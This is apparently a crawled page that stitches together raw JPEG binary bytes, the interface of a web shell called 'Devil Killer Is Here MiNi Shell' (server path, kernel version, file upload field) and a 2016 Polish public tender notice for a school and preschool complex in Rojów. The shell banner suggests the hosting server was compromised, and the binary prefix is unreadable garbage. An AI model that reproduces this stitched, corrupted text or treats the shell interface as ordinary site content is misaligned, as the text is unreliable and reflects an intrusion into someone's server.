JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160602/66235-N-2016.html

<p class="kh_header"><b>Ostrzeszów: Przedmiot zamówienia obejmuje budowę Zespołu Szkolno-Przedszkolnego w Rojowie                                     przy ul. Stefana Czarnieckiego gm. Ostrzeszów wraz z zagospodarowaniem terenu i infrastrukturą techniczną.</b><br>
<b>Numer ogłoszenia: 66235 - 2016; data zamieszczenia: 02.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Obsługi Placówek Oświatowych , ul. Zamkowa 31, 63-500 Ostrzeszów, woj. wielkopolskie, tel. 62 7320679, faks 62 7320601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrzeszow.nowoczesnagmina.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.ostrzeszow.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia obejmuje budowę Zespołu Szkolno-Przedszkolnego w Rojowie                                     przy ul. Stefana Czarnieckiego gm. Ostrzeszów wraz z zagospodarowaniem terenu i infrastrukturą techniczną..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje budowę Zespołu Szkolno-Przedszkolnego w Rojowie                                     przy ul. Stefana Czarnieckiego gm. Ostrzeszów wraz z zagospodarowaniem terenu i infrastrukturą techniczną. 

Wyciąg opisu technicznego z Dokumentacji Projektowej 

Projektowany  kompleks  obiektów  przeznaczony  ma  być  do  użytkowania  przez ok. 450 uczniów                i 75 dzieci przedszkolnych. W związku z tym wydzielono dwa zespoły funkcyjne: 
-zespół wychowania przedszkolnego i nauczania zintegrowanego dla dzieci w wieku 3-5 lat, zorganizowanych w 3 oddziałach (3 grupy po 25 dzieci - czyli ok. 75 dzieci) i dla uczniów klas I-III zorganizowanych w 9 oddziałach (9 klas po 25 uczniów - czyli ok. 225 uczniów) 
-zespół nauczania uczniów klas IV-VI zorganizowanych w 9 oddziałach (9 klas po 25 uczniów - czyli ok. 225 uczniów) 
Dla  wyżej  wymienionych  zespołów  przewidziano  wspólny  zespół administracyjno-socjalny wraz               z blokiem żywieniowymi blokiem sportowym. Poszczególne  zespoły i bloki  tworzą  zwartą  zabudowę kompleksu  szkolnego  w formie 3 segmentów. 

Segment  1-szy stanowi  dwukondygnacyjna  część  budynku  położona  w południowo-wschodniej  części  działki.  Na  parterze  zaprojektowano  przedszkole  w skład,  którego  wchodzą  3  sale  dydaktyczne,  szatnia, pom.  sanitarne.  Zespół  tych pomieszczeń posiada osobne wejście od strony placu  przed budynkiem jak również bezpośrednie  wyjście  na  teren  wydzielonego  placu  zabaw.  Komunikacyjnie połączona z przedszkolem jest świetlica szkolna, pokój nauczycielski wraz z zespołem sanitarnym dla nauczycieli oraz aula szkolna. Aula o elipsoidalnym rzucie znajduje się                                w  północno-wschodnim  narożu  kompleksu  i  dostępna  jest  z  holu  wejściowego  od strony  placu  przed  szkołą.  W  pobliżu  auli  zaprojektowano  klatkę  schodową, prowadzącą na poziom I piętra, gdzie znajduje się zespół nauczania uczniów klas IIII.  W  skład  w/w  zespołu  wchodzi  9  sal  lekcyjnych  w tym  jedna  pracownia komputerowa,  szatnia,  zespół  toalet  dla  uczniów,  osób  niepełnosprawnych,  toalet dla  nauczycieli,  sala  gimnastyki  korekcyjnej  oraz  przestronne  doświetlone  hole  i korytarze. W sąsiedztwie sali do gimnastyki korekcyjnej zaprojektowano drugą klatkę schodową,  stanowiąca  bezpośrednie  połączenie  z  częścią  przedszkolną  na 2 parterze. 










Segment 2-gi to dwukondygnacyjny budynek szkoły podstawowej dla uczniów klas  IV-VI  oraz  dwa  jednokondygnacyjne  łączniki:  pomieszczenia  administracyjne oraz  kuchenne  i  techniczne.                        W  łączniku  od  strony  auli  i  przedszkola  znajdują  się pomieszczenia  gospodarcze  i  socjalne  dla  personelu  technicznego  szkoły  oraz zespół  pomieszczeń  bloku  żywieniowego  (kuchnia,  magazyny,  zmywalnia,  pom. intendenta, pom. socjalne itp.) wraz ze stołówką szkolną na ok. 40 os. W środkowej części  segmentu  przewidziano  miejsce  dla  szatni  uczniów  klas  IV-VI  oraz  pięciu  sal lekcyjnych                 i  dwóch  klatek  schodowych  prowadzących  na  I  piętro.  W  drugim łączniku znajduje się główne wejście do szkoły wraz z portiernią oraz pomieszczenia administracyjne  (gabinety  dyrektorów,  sekretariat,  archiwum,  pokój  logopedy, psychologa/pedagoda, higienistki) z indywidualnym zapleczem sanitarnym. Na I piętrze segmentu 2-giego zaprojektowano pięć sal lekcyjnych w tym jedną pracownię  komputerową  oraz  toalety  dla  uczniów  i  osób  niepełnosprawnych. Oprócz  sal  lekcyjnych  na  tej  kondygnacji  przewidziano  przestronny  pokój nauczycielski z aneksem socjalnym, toalety dla nauczycieli, pom. gospodarcze oraz bibliotekę szkolną wraz z czytelnią. 

Segment 3-ci to  pomieszczenia  bloku  sportowego  wraz  z  osobnym  wejściem z zewnątrz.                      W skład nich wchodzą sala gimnastyczna, magazyn sprzętu sportowego, cztery  szatnie  dla  uczniów  wraz  z  umywalniami,  pokój  nauczycieli  w-f  z  osobną łazienką,  toalety  ogólnodostępne,  oraz  pomieszczenia  techniczne  i  pom.  węzła ciepła.  W  sali  sportowej  o  wym.  wewnętrznych                    24,85m x  37,75m  przewidziano możliwość  podziału  areny  rozsuwaną  kotarą  dla  równoczesnego  korzystania  z  sali przez dwie grupy uczniów. Wielkość areny (19x36m) umożliwia utworzenie  w  niej  boiska  do  siatkówki  9x18m,  boiska  do  koszykówki 14x28m,  boiska  do  piłki  ręcznej  ok.  15x35m  oraz  dwóch  mniejszych  boisk  do  mini siatkówki; 

Parametry obiektu (wg PN-70/B-02365) 
-powierzchnia zabudowy  4.772,1 m
-powierzchnia netto: 
- pow. użytkowa podstawowa 2.314,7 m2 
- pow. użytkowa pomocnicza  1.800,7 m2 
- powierzchnia ruchu i usługowa 1652,1 m2 
Razem: 5.767,2 m2 
Kubatura  3.6146 m3.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.91-4, 45.33.00.00-9, 45.23.31.40-2, 45.31.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości 200.000,00 zł.                         (słownie - dwieście tysięcy złotych).
Wadium należy wnieść przed upływem terminu składania ofert tj. najpóźniej do dnia 24.06.2016 r. do godz. 12.00 
Wadium może być wnoszone w jednej lub kilku następujących formach
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy                       z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości                        (DZ.U. Nr 109, poz. 1158 z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Działalność prowadzona na potrzeby niniejszego zamówienia nie wymaga posiadania przez wykonawcę szczególnie specjalnych uprawnień;
Oświadczenie o spełnieniu warunków udziału w postępowaniu o którym mowa w art. 22 ust. 1                  ustawy PZP; (wg wzoru zał. nr 2 do siwz);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia.
Wykaz robót budowlanych wykonanych w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Przez pojęcie najważniejszych robót, zamawiający rozumie roboty budowlane polegające na realizacji co najmniej jednego zamówienia polegającego na budowie od podstaw lub rozbudowie, remoncie, modernizacji w jednym ciągłym cyklu  realizacyjnym na podstawie jednej umowy wykonawczej - obiektu kubaturowego wraz z infrastrukturą techniczną (instalacjami wewnętrznymi) o charakterze użyteczności publicznej o powierzchni użytkowej netto nie mniejszej niż 5.000 m2 (pięć tysięcy).
Zgodnie z Obwieszczeniem Ministra Infrastruktury i Rozwoju z dnia 17 lipca 2015 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Ministra Infrastruktury w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie, zamawiający uzna za budynek użyteczności publicznej obiekty mieszczące się w definicji par. 3 pkt 6 niniejszego rozporządzenia.
Ilekroć w rozporządzeniu jest mowa o
budynku użyteczności publicznej - należy przez to rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji, za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym.
Oświadczenie o spełnieniu warunków udziału w postępowaniu o którym mowa w art. 22 ust. 1                  ustawy PZP; (wg wzoru zał. nr 2 do siwz);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi              do wykonania zamówienia;
 Dysponowanie odpowiednim potencjałem kadrowym (osobami zdolnymi do wykonania zamówienia);
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; 
Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia,                               a w szczególności poniższym personelem kierowniczym
a)	co najmniej jedną osobą - wyznaczoną do funkcji kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń                       w specjalności konstrukcyjno-budowlanej oraz co najmniej 5 letnie doświadczenie                    w pełnieniu funkcji kierownika budowy lub kierownika robót budowlanych przy realizacji budynków użyteczności publicznej w tym wykaże, że nadzorował co najmniej 1 budynek                    z przeznaczeniem na cele - oświaty (np. budowa przedszkola, szkoły, zespołu szkół, itp.), szkolnictwa wyższego (np. campusy studenckie, akademiki, itp.), nauki lub wychowania;
b)	co najmniej jedną osobą - wyznaczoną do funkcji kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń                       w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodnych i kanalizacyjnych oraz co najmniej 3 letnie doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót budowlanych;
c)	co najmniej jedną osobą - wyznaczoną do funkcji kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń                       w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz co najmniej 3 letnie doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót budowlanych;
d)	co najmniej jedną osobą - wyznaczoną do funkcji kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń                       w specjalności drogowej oraz co najmniej 3 letnie doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót budowlanych.

Wykonawca winien złożyć oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeśli ustawy nakładają taki obowiązek posiadania takich uprawnień (uprawnienia budowlane personelu kierowniczego); 
Wykonawca wykaże, że średnie roczne zatrudnienie pracowników u wykonawcy oraz liczebność personelu kierowniczego, w okresie ostatnich  trzech lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, wynosi minimum 30 osób w każdym roku, w tym personelu kierowniczego (inżynieryjno-technicznego) minimum 3 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej;

Wykonawca wykaże, przedstawi informację o posiadaniu środków finansowych w banku                     lub spółdzielczej kasie oszczędnościowo-kredytowej lub zdolności kredytowej wykonawcy                      w wysokości 10.000.000,00 zł. (dziesięć milionów złotych);

Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 8.000.000,00 zł. (osiem milionów złotych);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
